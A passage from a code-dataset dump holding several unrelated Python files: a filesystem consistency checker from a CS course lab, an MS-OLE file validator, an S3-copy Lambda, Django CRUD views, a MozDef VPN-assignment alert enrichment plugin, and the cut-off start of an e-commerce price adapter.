blocks\n\t\t\t\t\t\t\t\t\t\tfor indirect_3 in indirect_data:\n\t\t\t\t\t\t\t\t\t\t\tindirect_line = indirect_3.rstrip('\\n').split(',')\n\t\t\t\t\t\t\t\t\t\t\tdec_indirect_block = int(indirect_line[2], 16)\n\t\t\t\t\t\t\t\t\t\t\t#Check for invalid blocks pointed to by the single indirect block pointers\n\t\t\t\t\t\t\t\t\t\t\tif(dec_indirect_block == 0 or dec_indirect_block > int(total_blocks)):\n\t\t\t\t\t\t\t\t\t\t\t\tout_file.write(\"INVALID BLOCK < \" + str(dec_indirect_block) + \" > IN INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16) + entry_offset) + \" > ENTRY < \" + str(indirect_line[1]) + \" >\\n\")\n\t\t\t\t\t\t\t\t\t\t\tif(dec_indirect_block in free_blocks):\n\t\t\t\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in block_dict):\n\t\t\t\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\t\t\t\ttemp = block_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16)) + \" > ENTRY < \" + str(int(indirect_line[1]) + entry_offset) + \" >\")\n\t\t\t\t\t\t\t\t\t\t\t\tblock_dict[str(dec_indirect_block)] = temp\n\t\t\t\t\t\t\t\t\t\t\tif(str(dec_indirect_block) not in duplicate_dict):\n\t\t\t\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_indirect_block)] = []\n\t\t\t\t\t\t\t\t\t\t\ttemp = duplicate_dict[str(dec_indirect_block)]\n\t\t\t\t\t\t\t\t\t\t\ttemp.append(\" INODE < \" + str(inode_line[0]) + \" > INDIRECT BLOCK < \" + str(int(inode_line_sub[14], 16)) + \" > ENTRY < \" + str(int(indirect_line[1]) + entry_offset) + \" >\")\n\t\t\t\t\t\t\t\t\t\t\tduplicate_dict[str(dec_data_block)] = temp\n\t\t\t\t\t\t\t\t\t\t\tcounter += 1\n\t\t#Go through the block dictionary to find out what to print for unallocated blocks\n\t\tfor element in block_dict:\n\t\t\tif(len(block_dict[element]) > 0):\n\t\t\t\tout_file.write(\"UNALLOCATED BLOCK < \" + str(element) + \" > REFERENCED BY\")\n\t\t\t\tfor out_string in 
block_dict[element]:\n\t\t\t\t\tout_file.write(out_string)\n\t\t\t\tout_file.write(\"\\n\")\n\n#Use the duplicate dictionary to find the multiply allocated blocks\ndef duplicate_allocated_blocks(out_file):\n\tglobal duplicate_dict\n\tfor key in duplicate_dict:\n\t\t#If the number of referenced inodes for the respective block number is more than 1, then we know its multiply allocated \n\t\tif(len(duplicate_dict[key]) > 1 and key != \"0\"):\n\t\t\tstatement = \"MULTIPLY REFERENCED BLOCK < \" + key + \" > BY\"\n\t\t\tfor tup in duplicate_dict[key]:\n\t\t\t\tstatement += tup\n\t\t\tstatement += '\\n'\n\t\t\tout_file.write(statement)\n\n#Check for unallocated inodes\ndef unallocated_inode(directory_file, out_file):\n\tglobal inode_data\n\tfile_list = open_files()\n\tlists = init_lists()\n\tfree_inodes = lists[1]\n\t#Dictionary of inodes to the referenced directory entries\n\tunallocated_dict = {}\n\t#Holds a list of allocated inodes from the inode.csv file for use in other functions\n\tinode_data = []\n\twith open(\"inode.csv\", \"r\") as inode_file:\n\t\tfor line in inode_file:\n\t\t\tinode_line = line.split(',')\n\t\t\tinode_data.append(inode_line[0])\n\twith open(\"directory.csv\", \"r\") as file_1:\n\t\tfor line in file_1:\n\t\t\t#Ignore the naming of the file/directory as that could have unwanted characters\n\t\t\tdirectory_line = line.split(',')[0:5]\n\t\t\tif(len(directory_line) == 5 and (int(directory_line[4]) in free_inodes or directory_line[4] not in inode_data)):\n\t\t\t\tif(str(directory_line[4]) not in unallocated_dict):\n\t\t\t\t\tunallocated_dict[str(directory_line[4])] = []\n\t\t\t\ttemp = unallocated_dict[str(directory_line[4])]\n\t\t\t\ttemp.append(\" DIRECTORY < \" + directory_line[0] + \" > ENTRY < \" + directory_line[1] + \" >\")\n\t\t\t\tunallocated_dict[str(directory_line[4])] = temp\n\t#Go through the unallocated inodes and print out the respective information\n\tfor element in unallocated_dict:\n\t\tif(len(unallocated_dict[element]) > 0):\n\t\t\tout_file.write(\"UNALLOCATED INODE < \" + element + \" > REFERENCED BY\")\n\t\t\tfor out_string in unallocated_dict[element]:\n\t\t\t\tout_file.write(out_string)\n\t\t\tout_file.write(\"\\n\")\n#Find missing inodes by looking through the allocated inodes and free inodes, and the overall number of inodes\ndef missing_inode(inode_file, out_file):\n\tglobal inode_data\n\tfile_list = open_files()\n\tlists = init_lists()\n\tfree_inodes = lists[1]\n\tinode_block_num = lists[3]\n\ttotal_inodes = lists[5]\n\tinodes_per_group = lists[6]\n\twith open(\"inode.csv\", \"r\") as file_1:\n\t\tfor line in file_1:\n\t\t\tinode_line = line.split(',')[0:10]\n\t\t\t#Ignoring the first 10 reserved inodes, look to see if the allocated inode is missing from the free list\n\t\t\tif(inode_line[5] == \"0\" and inode_line[0] not in free_inodes and int(inode_line[0]) > 10):\n\t\t\t\tlist_num = 0\n\t\t\t\t#Find out which free list it should belong to\n\t\t\t\tfor i in range(len(inode_block_num)):\n\t\t\t\t\tlist_num += int(inodes_per_group)\n\t\t\t\t\tif(list_num > int(inode_line[0])):\n\t\t\t\t\t\tlist_num = int(inode_block_num[i])\n\t\t\t\t\t\tbreak\n\t\t\t\tout_file.write(\"MISSING INODE < \" + inode_line[0] + \" > SHOULD BE IN FREE LIST < \" + str(list_num) + \" >\\n\")\n\t#Go through all inodes from 11 to max inode number to see if they don't exist in the free list or allocated inodes\n\tfor i in range(11, int(total_inodes)):\n\t\tif(i not in free_inodes and str(i) not in inode_data):\n\t\t\tlist_num = 0\n\t\t\tfor i in 
range(len(inode_block_num)):\n\t\t\t\tlist_num += int(inodes_per_group)\n\t\t\t\tif(list_num > i):\n\t\t\t\t\tlist_num = int(inode_block_num[i])\n\t\t\t\t\tbreak\n\t\t\tout_file.write(\"MISSING INODE < \" + str(i) + \" > SHOULD BE IN FREE LIST < \" + str(list_num) + \" >\\n\")\n\n#Calculate the link counts by looking at the references and the actual number of links in inode.csv\ndef incorrect_link_count(inode_file, out_file):\n with open(\"inode.csv\", \"r\") as file_1:\n for line in file_1:\n inode_line = line.split(',')\n #Reported link count\n link_count = inode_line[5]\n inode_num = inode_line[0]\n reference_count = 0\n with open(\"directory.csv\", \"r\") as file_2:\n \t#Calculate the actual number of links by looking through all the directories\n for line_2 in file_2:\n directory_line = line_2.split(',')[0:5]\n if(len(directory_line) == 5 and directory_line[4] == inode_num):\n reference_count += 1\n if(int(link_count) != int(reference_count)):\n out_file.write(\"LINKCOUNT < \" + str(inode_num) + \" > IS < \" + str(link_count) + \" > SHOULD BE < \" + str(reference_count) + \" >\\n\")\n \n#Look at the . and .. to look for inconsistent directory entries\ndef incorrect_directory_entry(directory_file, out_file):\n data = \"\"\n dataFile = open(\"directory.csv\", \"r\")\n data = dataFile.readlines()\n with open(\"directory.csv\", \"r\") as file_1:\n for line in file_1:\n directory_line = line.split(',')\n if(len(directory_line) == 6):\n \t#Check for the current directory against its own parent inode, they should be the same, else its an error\n if(directory_line[5] == '\".\"\\n'):\n if(directory_line[0] != directory_line[4]):\n out_file.write(\"INCORRECT ENTRY IN < \" + directory_line[0] + \" > NAME < . > LINK TO < \" + directory_line[4] + \" > SHOULD BE < \" + directory_line[0] + \" >\\n\")\n elif(directory_line[5] == '\"..\"\\n'):\n for line_2 in data:\n directory_line_2 = line_2.split(',')\n if(len(directory_line_2) == 6):\n #Look through the referenced parent directory to see if it contains a child directory that is the referencee directory\n if(directory_line_2[4] == directory_line[0] and directory_line_2[0] != directory_line[4] and directory_line_2[5] != '\".\"\\n' and directory_line_2[5] != '\"..\"\\n'):\n out_file.write(\"INCORRECT ENTRY IN < \" + directory_line[0] + \" > NAME < .. 
> LINK TO < \" + directory_line[4] + \" > SHOULD BE < \" + directory_line_2[0] + \" >\\n\")\n\n#Open all the files initially and put them in a list for easy closing\ndef open_files():\n super_f = open(\"super.csv\", \"r\")\n group_f = open(\"group.csv\", \"r\")\n bitmap_f = open(\"bitmap.csv\", \"r\")\n inode_f = open(\"inode.csv\", \"r\")\n directory_f = open(\"directory.csv\", \"r\")\n indirect_f = open(\"indirect.csv\", \"r\")\n out_f = open(\"lab3b_check.txt\", \"w+\")\n file_list = [super_f, group_f, bitmap_f, inode_f, directory_f, indirect_f, out_f]\n return file_list\n\n#Close all files\ndef close_files():\n f_list = open_files()\n for file in f_list:\n file.close()\n\n#Generate all the possible errors by parsing all the given files\ndef main():\n file_list = open_files()\n block_errors(file_list[6]) \n duplicate_allocated_blocks(file_list[6])\n unallocated_inode(file_list[4], file_list[6])\n missing_inode(file_list[3], file_list[6])\n incorrect_link_count(file_list[3], file_list[6])\n incorrect_directory_entry(file_list[3], file_list[6])\n close_files()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jcherianucla/UCLA-CS-111","sub_path":"Project 3B/lab3b.py","file_name":"lab3b.py","file_ext":"py","file_size_in_byte":17855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43548247502","text":"import array\nimport struct\n\nfrom Validator import Validator\n\n\nclass MSOLEValidator(Validator):\n \"\"\"\n Class that validates an object to determine if it is a valid MSOle file.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Calls to super().__init__(). No specific attributes are needed.\n \"\"\"\n super(MSOLEValidator, self).__init__()\n # some initial values in case someone calls GetDetails() early:\n self.extension = []\n self.sector_size = -1\n self.sat = []\n self.sat_dict = {}\n self.msat = []\n self.msat_secs = []\n self.msat_secids = []\n self.sat_secs = -1\n self.max_sector = -1\n self.converters = { # this dictionary defines the behaviour of _ConvertBytes, DO NOT TOUCH!\n 'sH': struct.Struct(\" -1\n\n def _FilterMsat(self, x):\n return x < -2\n\n def _FilterSat(self, x):\n return x < -4 or x > self.max_sector\n\n def _GetExtension(self):\n self.extension = []\n if self.is_valid:\n #self.fd.seek(0)\n #data = self.fd.read(self.bytes_last_valid)\n if \"Word Document\" in self.data:\n self.extension.append(\".doc\")\n if \"Worksheet\" in self.data: # or \"Workbook\" in data: # need to confirm this\n self.extension.append(\".xls\")\n if \"PowerPoint\" in self.data:\n self.extension.append(\".ppt\")\n # should change all this comparisons for one regex that matches and get the result from\n # a dict -- that should have better performance, though i doubt this might be a problem.\n\n def _Read(self, length):\n ret = self.data[self.pos: self.pos + length]\n if len(ret) < length:\n self.eof = True\n self.pos += length\n return ret\n\n def GetDetails(self):\n \"\"\"\n Returns a dictionary with detailed information about the last validated file.\n\n :return: dict of:\n * sector_size (int)\n * msat (list of ints)\n * msat_secs (int)\n * msat_secids (list of ints)\n * sat_secs (int)\n \"\"\"\n return {\n \"sector_size\": self.sector_size,\n \"msat\": self.msat,\n \"sat\": self.sat,\n \"msat_secs\": self.msat_secs,\n \"msat_secids\": self.msat_secids,\n \"sat_secs\": self.sat_secs,\n \"extensions\": self.extension,\n \"max_sector\": self.max_sector,\n }\n \n def Validate(self, fd):\n \"\"\"\n Validates a file-like object to 
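Note that close_files() above calls open_files() a second time and closes those fresh handles, so the descriptors opened at the start of main() are never actually closed. A sketch of the usual fix, managing every handle with one contextlib.ExitStack (same file names as the original):

from contextlib import ExitStack

def main():
    names = ["super.csv", "group.csv", "bitmap.csv",
             "inode.csv", "directory.csv", "indirect.csv"]
    with ExitStack() as stack:
        files = [stack.enter_context(open(n)) for n in names]
        out_f = stack.enter_context(open("lab3b_check.txt", "w+"))
        # ... run the consistency checks against `files` and `out_f` ...
    # every handle is closed here, even if a check raised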
determine if its a valid MS-OLE file.\n\n :param fd: file descriptor (file-like)\n :return: True on valid MS-OLE, False otherwise (bool)\n \"\"\"\n # GetDetails cleanup of variables\n self.extension = []\n self.sector_size = -1\n self.sat = []\n self.sat_dict = {}\n self.msat = []\n self.msat_secs = -1\n self.msat_secids = []\n self.sat_secs = -1\n self.max_sector = -1\n sector_size = -1 # i think this four variables should go away once cleanup is over\n # and rest of the initial setup\n self.pos = 0\n if type(fd) == file:\n self.data = fd.read()\n elif type(fd) == str:\n self.data = fd\n else:\n raise Exception(\"Argument must be either a file or a string.\")\n self.is_valid = True\n self._SetValidBytes(0)\n self.eof = False\n self.end = False\n cdh = self._Read(512)\n sector = \"\"\n header = cdh[0:8]\n byte_order = cdh[28:30] # MS-OLE supports big endian and little endian data, however we\n # couldn't find a big endian file to check if the validator works correctly.\n ssz = self._ConvertBytes(cdh[30:32], \"sH\")\n # x and sat_secs are declared here to avoid referenced-before-assignment errors\n x_index = 0\n self.is_valid = ((header == '\\xd0\\xcf\\x11\\xe0\\xa1\\xb1\\x1a\\xe1') and\n (byte_order == '\\xfe\\xff' or byte_order == '\\xff\\xfe') and\n (ssz >= 7) and len(cdh) == 512)\n if self.is_valid:\n # So far we have a valid CDH, now we have to:\n # * build the MSAT\n # * walk through the SAT, verifying with the MSAT the SAT-assigned sectors\n # The file will be valid as long as the SAT and MSAT are coherent between each other.\n # This method is based on Simson Garfinkel's S2 MS-OLE validator, with modifications\n # adapted from OpenOffice MS-OLE format description and methods to comply with the\n # Validation Framework.\n self._SetValidBytes(512)\n self.sector_size = 1 << ssz\n self.sat_secs = self._ConvertBytes(cdh[44:48], \"sL\")\n msat_secid = self._ConvertBytes(cdh[68:72], \"sL\")\n self.msat_secids.append(msat_secid)\n self.msat_secs = self._ConvertBytes(cdh[72:76], \"sL\")\n self.msat = array.array(\"l\", cdh[76:512])\n file_location = -1\n while (msat_secid > -1) and not self.eof:\n new_location = 512 + (msat_secid * sector_size)\n if new_location <= file_location:\n self.is_valid = False\n break\n file_location = new_location\n try:\n self.pos = file_location\n #self.fd.seek(file_location) # maybe _Read() should have a location parameter?\n except IOError:\n self.is_valid = False\n break\n sector_raw = self._Read(sector_size)\n if len(sector_raw) < sector_size:\n break\n try:\n sector = array.array(\"l\", sector_raw)\n except ValueError:\n self.is_valid = False\n break\n msat_secid = sector[-1]\n self.msat.extend(sector[:-1])\n self.msat_secids.append(msat_secid)\n # We filter the MSAT to validate its length, everything higher than -1 is a valid\n # MSAT sector - then we compare against the CDH information.\n self.msat = filter(self._FilterCDH, self.msat)\n self.max_sector = len(self.msat) * (self.sector_size / 4)\n self.is_valid = self.is_valid and (len(self.msat) == self.sat_secs)\n #self.is_valid = self.is_valid and (filter(lambda(x): x < -2, msat) == [])\n self.is_valid = self.is_valid and (filter(self._FilterMsat, self.msat) == [])\n if self.is_valid and not self.eof:\n # Now we go through the SAT looking for sectors with value -3, and verifying that\n # they are also present in the MSAT. If we find a mismatch, that means we have a\n # corrupt file.\n # We also check for -4 in the SAT, which are MSAT sectors. 
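Validate() above is Python 2 code (note the `type(fd) == file` test and the str-typed byte comparisons). A minimal Python 3 sketch of just the compound-document-header check it begins with, working on bytes with struct:

import struct

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

def looks_like_ole(data: bytes) -> bool:
    if len(data) < 512 or data[:8] != OLE_MAGIC:
        return False
    byte_order = data[28:30]                    # \xfe\xff little, \xff\xfe big
    (ssz,) = struct.unpack("<H", data[30:32])   # sector size = 1 << ssz
    return byte_order in (b"\xfe\xff", b"\xff\xfe") and ssz >= 7

print(looks_like_ole(OLE_MAGIC + b"\x00" * 504))   # False: byte order/ssz unset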
Also, as a first check\n # we look for values lower than -4 or higher than self.max_sector, because they\n # are signs of a corrupt file.\n base_sector = 0\n base_sector_inc = self.sector_size / 4\n x_index = 0\n len_msat = len(self.msat)\n file_location = 512\n while self.is_valid and (x_index < len_msat) and not self.eof:\n x = self.msat[x_index]\n self._SetValidBytes(file_location + self.sector_size)\n file_location = 512 + (x * self.sector_size)\n try:\n self.pos = file_location\n #self.fd.seek(file_location)\n except IOError:\n self.is_valid = False\n break\n sector_raw = self._Read(self.sector_size)\n if len(sector_raw) < self.sector_size:\n self.is_valid = False\n break\n try:\n sector = array.array(\"l\", sector_raw)\n except ValueError:\n self.is_valid = False\n break\n #self.is_valid = filter(lambda(x): x < -4, sector) == []\n self.is_valid = filter(self._FilterSat, sector) == []\n sat_len = len(self.sat_dict)\n clean_sector = filter(self._FilterCDH, sector)\n self.sat_dict.update({}.fromkeys(clean_sector, True))\n self.is_valid = self.is_valid and len(self.sat_dict) == sat_len + len(clean_sector)\n if not self.is_valid:\n break\n self.sat.extend(sector)\n for key, val in enumerate(sector, base_sector):\n if val == -3:\n if not(key in self.msat):\n self.is_valid = False\n break\n elif val == -4:\n if not(key in self.msat_secids):\n self.is_valid = False\n break\n base_sector += base_sector_inc\n x_index += 1\n else:\n pass\n #print \"Bad MSAT.\"\n else:\n pass\n if self.is_valid and (x_index == self.sat_secs) and sector and not self.eof:\n # Validation is over and we analyzed the entire SAT. sector still has the contents of\n # the last SAT-sector. We will do a last step to calculate the real file size out of\n # this information:\n # We will reverse sector, and look for the first non -1 value in it, which is the last\n # assigned sector that the SAT has information about. 
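The recurring `filter(...) == []` tests in this section only behave as intended on Python 2, where filter returns a list; on Python 3 filter returns an iterator, so the comparison is always False and is_valid would be forced off. A version-independent sketch of the SAT range check using any():

# Python 2 idiom from the validator:
#   self.is_valid = filter(self._FilterSat, sector) == []
# Equivalent on both 2 and 3: valid when no entry is out of range.
def sat_entries_ok(sector, max_sector):
    return not any(x < -4 or x > max_sector for x in sector)

print(sat_entries_ok([0, 1, -1, -3], max_sector=128))   # True
print(sat_entries_ok([0, 999], max_sector=128))         # False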
We can't look for the first -1\n # found in sector because a MS-OLE valid file could have a -1 from a freed sector and\n # we'd be cutting short the file.\n last_sat = sector[:]\n last_sat.reverse()\n x = 0\n b = last_sat[x]\n while b == -1 and x < len(last_sat) - 1:\n x += 1\n b = last_sat[x]\n free_secs = x\n sat_secs = self.sat_secs\n sector_size = self.sector_size # assign this variables for shortness un the next calc\n bytes_last_valid = 512 + ((((sat_secs - 1) * (sector_size / 4)) * sector_size)\n + (((sector_size / 4) - free_secs) * sector_size))\n self._SetValidBytes(bytes_last_valid)\n self.end = True\n else:\n self.is_valid = False\n self._GetExtension()\n return self.is_valid # and not(self.eof) # this was semantically flawed","repo_name":"info-lab/FileValidators","sub_path":"FileValidators/MSOLEValidator.py","file_name":"MSOLEValidator.py","file_ext":"py","file_size_in_byte":11324,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"10604183338","text":"import json\nimport logging\nimport boto3\nfrom pathlib import Path\nfrom urllib.parse import urlparse\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\ns3_client = boto3.client('s3')\ns3 = boto3.resource('s3')\n\ndef remove_prefix(text, prefix):\n return text[text.startswith(prefix) and len(prefix):]\n \ndef write_input_output(input_path, output_path):\n input_bucket, input_key = input_path.replace(\"s3://\", \"\").split(\"/\", 1)\n output_bucket, output_key = output_path.replace(\"s3://\", \"\").split(\"/\", 1)\n\n print(input_bucket)\n print(input_key)\n s3_input_bucket = s3.Bucket(input_bucket)\n if input_key.endswith(\"/\"):\n for obj in s3_input_bucket.objects.filter(Prefix=input_key):\n copy_source = {\n 'Bucket': input_bucket,\n 'Key': obj.key\n } \n \n destination_key = remove_prefix(obj.key, input_key)\n if len(destination_key) > 0:\n destination_key = output_key + destination_key\n print(f\"Copying object to {output_bucket}/{destination_key}\")\n s3_client.copy(copy_source, output_bucket, destination_key)\n else:\n if \"/\" in input_key:\n destination_key = output_key + input_key.split(\"/\")[-1]\n else:\n destination_key = output_key + input_key\n\n copy_source = {\n 'Bucket': input_bucket,\n 'Key': input_key\n }\n print(f\"Copying object to {output_bucket}/{destination_key}\")\n s3_client.copy(copy_source, output_bucket, destination_key)\n\ndef lambda_handler(event, context):\n \"\"\"\n Example of a NoOp pipeline\n Uploads input file to output\n \"\"\"\n print(event)\n if isinstance(event['body'], str):\n data = json.loads(event['body'])\n else:\n data = event['body']\n\n write_input_output(data['inputPath'], data['outputPath'])\n return {\n 'statusCode': 200, \n 'body': 'Success'\n }","repo_name":"awslabs/visual-asset-management-system","sub_path":"infra/lib/artefacts/sample_lambda_pipeline/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"61"} +{"seq_id":"31132802607","text":"from django.http import HttpRequest\nfrom django.shortcuts import redirect, render\nfrom django.contrib import messages\n\n\nfrom app.models import Exetat\nfrom app.forms import ExetatForm\n\n\ndef index(request):\n assert isinstance(request, HttpRequest)\n exetats = Exetat.objects.all()\n return render(\n request,\n 'app/organisateur/templates/exetats/index.html',\n {\n 'exetats': exetats\n }\n )\n \ndef add(request):\n if 
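The Lambda above imports urllib.parse.urlparse (and pathlib.Path) but then splits the s3:// URLs by hand with replace/split. A sketch of the same split done through urlparse, which also rejects non-S3 URLs:

from urllib.parse import urlparse

def split_s3_url(url: str):
    # "s3://bucket/some/prefix/" -> ("bucket", "some/prefix/")
    parsed = urlparse(url)
    if parsed.scheme != "s3":
        raise ValueError(f"not an s3 url: {url}")
    return parsed.netloc, parsed.path.lstrip("/")

print(split_s3_url("s3://my-bucket/input/data.csv"))
# ('my-bucket', 'input/data.csv')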
request.method == 'GET' :\n form = ExetatForm()\n \n return render(\n request, \n 'app/organisateur/templates/exetats/add.html',\n {\n 'form': form\n }\n )\n \ndef store(request):\n if request.method == 'POST':\n form = ExetatForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, \"L'Edition' a été enregistrée avec succès !\")\n else :\n messages.success(request, form.errors)\n return redirect('/organisateur/templates/exetats')\n \ndef update(request, id):\n if request.method == 'POST':\n if id == 0:\n form = ExetatForm(request.POST)\n else:\n category = Exetat.objects.get(pk=id)\n form = ExetatForm(request.POST, instance=category)\n if form.is_valid():\n form.save()\n messages.success(request, \"La commune a été modifiée avec succès !\")\n return redirect('/organisateur/templates/exetats')\n\ndef edit(request, id):\n assert isinstance(request, HttpRequest)\n if request.method == 'GET':\n if id == 0:\n form = ExetatForm()\n else:\n exetat = Exetat.objects.get(pk=id)\n form = ExetatForm(instance=exetat)\n return render(\n request,\n 'app/organisateur/templates/exetats/edit.html',\n {\n 'form': form,\n }\n )\n\ndef delete(request, id):\n exetat = Exetat.objects.get(pk=id)\n exetat.delete()\n messages.success(request, \"L'Edition a été supprimée avec succès !\")\n return redirect('/organisateur/templates/exetats')\n\n","repo_name":"lysbernice/Stage_roject","sub_path":"app/views/exetats.py","file_name":"exetats.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16932948965","text":"import json\nimport os\nimport typing as types\n\nimport netaddr\n\nfrom lib.config import ES\nfrom mozdef_util.elasticsearch_client import ElasticsearchClient\nfrom mozdef_util.query_models import SearchQuery, TermMatch, PhraseMatch\nfrom mozdef_util.utilities.toUTC import toUTC\n\n\nCONFIG_FILE = os.path.join(\n os.path.dirname(__file__),\n __file__.replace('py', 'json'),\n)\n\n\n# TODO: Switch to dataclass when we adopt Python 3.7+\n\nclass Config(types.NamedTuple):\n '''Expected configuration for the plugin, loaded from JSON.\n '''\n\n indices_to_search: types.List[str]\n search_window_hours: int\n vpn_ip_cidrs: types.List[str]\n\n def load(file_path: str) -> 'Config':\n '''Attempt to parse a configuration from a JSON file.\n '''\n\n with open(file_path) as cfg_file:\n return Config(**json.load(cfg_file))\n\n\nclass message(object):\n '''Alert plugin that handles any alert and attempts to enrich it with\n information about VPN IP address assignments.\n\n This plugin will add the following fields to the alert:\n\n ```json\n {\n \"details\": {\n \"vpnassignment\": {\n \"username\": \"user@mozilla.com\",\n \"originalip\": \"1.2.3.4\",\n }\n }\n }\n ```\n '''\n\n def __init__(self):\n self.registration = ['*']\n\n self.config = Config.load(CONFIG_FILE)\n\n # Create a closure around an Elasticsearch client that can be invoked\n # with search terms to find events in the configured indices.\n es_client = ElasticsearchClient(ES['servers'])\n\n def search_fn(query):\n return query.execute(\n es_client,\n indices=self.config.indices_to_search,\n ).get('hits', [])\n\n self.search = search_fn\n\n def onMessage(self, msg):\n return enrich(\n msg,\n self.config.search_window_hours,\n self.config.vpn_ip_cidrs,\n self.search,\n )\n\n\ndef enrich(\n alert: dict,\n search_window_hours: int,\n vpn_ip_cidrs: types.List[str],\n search_fn: types.Callable[[SearchQuery], types.List[dict]],\n) -> dict:\n 
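Two details worth flagging in the Django views above: store() routes validation failures through messages.success (messages.error is the intended channel), and each bare Exetat.objects.get(pk=id) raises Exetat.DoesNotExist on an unknown id. A sketch of the delete view hardened with get_object_or_404; the other names are the module's own:

from django.shortcuts import get_object_or_404

def delete(request, id):
    # get_object_or_404 turns a missing primary key into an HTTP 404
    # instead of an unhandled Exetat.DoesNotExist exception.
    exetat = get_object_or_404(Exetat, pk=id)
    exetat.delete()
    messages.success(request, "L'Edition a été supprimée avec succès !")
    return redirect('/organisateur/templates/exetats')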
'''Search for events that describe an assignment of a VPN IP address to\n the sourceipaddress in an alert.\n '''\n\n details = alert.get('details', {})\n\n source_ip = details.get('sourceipaddress')\n\n if source_ip is None:\n return alert\n\n if netaddr.IPAddress(source_ip) not in netaddr.IPSet(vpn_ip_cidrs):\n return alert\n\n search_vpn_assignment = SearchQuery({\n 'hours': search_window_hours,\n })\n search_vpn_assignment.add_must([\n TermMatch('tags', 'vpn'),\n TermMatch('tags', 'netfilter'),\n TermMatch('details.success', 'true'),\n TermMatch('details.vpnip', source_ip),\n PhraseMatch('summary', 'netfilter add upon connection'),\n ])\n\n assign_events = sorted(\n [hit.get('_source', {}) for hit in search_fn(search_vpn_assignment)],\n key=lambda evt: toUTC(evt['utctimestamp']),\n reverse=True, # Sort into descending order from most recent to least.\n )\n\n if len(assign_events) == 0:\n return alert\n\n event = assign_events[0]\n\n details['vpnassignment'] = {\n 'username': event['details']['username'],\n 'originalip': event['details']['sourceipaddress'],\n }\n\n alert['details'] = details\n\n return alert\n","repo_name":"mozilla/MozDef","sub_path":"alerts/plugins/vpn_assignment.py","file_name":"vpn_assignment.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":2170,"dataset":"github-code","pt":"61"} +{"seq_id":"21788974754","text":"# zope imports\nfrom zope.interface import implements\nfrom zope.component import adapts\n\n# easyshop imports\nfrom easyshop.core.interfaces import IPrices\nfrom easyshop.core.interfaces import IProduct\nfrom easyshop.core.interfaces import IProductVariant\nfrom easyshop.core.interfaces import IProductVariantsManagement\nfrom easyshop.core.interfaces import IShopManagement\nfrom easyshop.core.interfaces import ITaxes\n\nclass ProductPrices(object):\n \"\"\"Provides IPrices for product content object.\n \"\"\"\n implements(IPrices)\n adapts(IProduct)\n\n def __init__(self, context):\n \"\"\"\n \"\"\"\n pvm = IProductVariantsManagement(context)\n shop = IShopManagement(context).getShop()\n \n self.context = context\n\n self.gross_prices = shop.getGrossPrices()\n self.has_variants = pvm.hasVariants()\n self.taxes = ITaxes(context)\n\n if self.has_variants:\n self.product_variant = \\\n pvm.getSelectedVariant() or pvm.getDefaultVariant()\n \n def getPriceForCustomer(self, effective=True, variant_price=True):\n \"\"\"\n \"\"\"\n if self.has_variants and variant_price and \\\n self.product_variant.getPrice() != 0:\n return IPrices(self.product_variant).getPriceForCustomer(effective)\n else:\n if effective == True:\n return self._getEffectivePriceForCustomer()\n else:\n return self._getStandardPriceForCustomer()\n \n def getPriceNet(self, effective=True, variant_price=True):\n \"\"\"\n \"\"\"\n if self.has_variants and variant_price and \\\n self.product_variant.getPrice() != 0:\n return IPrices(self.product_variant).getPriceNet(effective)\n else:\n if effective == True:\n return self._getEffectivePriceNet()\n else:\n return self._getStandardPriceNet()\n\n def getPriceGross(self, effective=True, variant_price=True):\n \"\"\"\n \"\"\"\n if self.has_variants and variant_price and \\\n self.product_variant.getPrice() != 0:\n return IPrices(self.product_variant).getPriceGross(effective)\n else:\n if effective == True:\n return self._getEffectivePriceGross()\n else:\n return self._getStandardPriceGross()\n\n # Effective Price\n def _getEffectivePriceForCustomer(self):\n \"\"\"Returns the effective price for 
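Because enrich() takes the search function as a parameter, it can be exercised without an Elasticsearch cluster. A sketch meant to run in the context of the module above, with a stubbed search_fn and a hypothetical VPN CIDR:

def fake_search(query):
    # Stand-in for the Elasticsearch closure: one matching netfilter event.
    return [{"_source": {
        "utctimestamp": "2020-01-01T00:00:00+00:00",
        "details": {"username": "user@mozilla.com",
                    "sourceipaddress": "203.0.113.7"},
    }}]

alert = {"details": {"sourceipaddress": "10.48.0.5"}}
enriched = enrich(alert, search_window_hours=24,
                  vpn_ip_cidrs=["10.48.0.0/16"],   # hypothetical VPN range
                  search_fn=fake_search)
print(enriched["details"]["vpnassignment"])
# {'username': 'user@mozilla.com', 'originalip': '203.0.113.7'}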
